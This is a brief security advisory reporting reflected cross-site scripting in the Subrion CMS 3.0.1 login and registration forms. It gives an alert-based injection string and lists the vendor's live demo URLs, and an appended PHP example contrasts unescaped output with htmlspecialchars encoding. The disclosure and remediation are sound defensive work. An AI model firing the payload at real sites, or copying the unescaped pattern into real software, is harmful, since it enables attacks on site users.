Subrion CMS version 3.0.1 suffers from a cross site scripting vulnerability.
Subrion CMS 3.0.1. Multiple Cross Site Scripting Vulnerabilities
Author : syst3m_f4ult
Homepage : http://www.subrion.com/
Vendor : subrion
Version : 3.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-10
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Two pages are vulnerable to XSS (Method: POST):
http://localhost/login/ [username parameter]
http://localhost/registration/ [username and email parameters]
Malicious Code:
"><script>alert('syst3m_f4ult')</script>
Demo:
http://cms.subrion.com/login/
http://cms.subrion.com/registration/
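
Added example (not part of the original advisory and not Subrion's code): the `">` prefix of the string above suggests the submitted value is echoed back inside an HTML attribute, which is an assumption here. The hypothetical PHP helpers below show that pattern beside an output-encoded version, and script_count() reports what an HTML parser makes of each.

```php
<?php
// Added example; function names are hypothetical, not Subrion's code.
// Assumption: the form redisplays the submitted value inside value="...".

// Before: the raw POST value is concatenated into the attribute.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Encode for an HTML attribute context; ENT_QUOTES covers " and '.
function attr(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// After: every dynamic value is encoded at the point of output.
function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . attr($name) . '" value="' . attr($value) . '">';
}

// Count the <script> elements an HTML parser finds in a fragment.
function script_count(string $html): int
{
    libxml_use_internal_errors(true);   // parser warnings are not the point here
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    return $doc->getElementsByTagName('script')->length;
}

// Test string taken from the advisory above.
$submitted = "\"><script>alert('syst3m_f4ult')</script>";

foreach (['unsafe' => 'render_field_unsafe', 'safe' => 'render_field_safe'] as $label => $fn) {
    $html = $fn('username', $submitted);
    printf("%-6s script elements: %d\n       %s\n", $label, script_count($html), $html);
}

// Defence in depth for the email parameter: reject values that are not addresses.
var_dump(filter_var($submitted, FILTER_VALIDATE_EMAIL));
```

Encoding at the point of output is the primary fix; the email check only narrows what reaches the template and does not replace it.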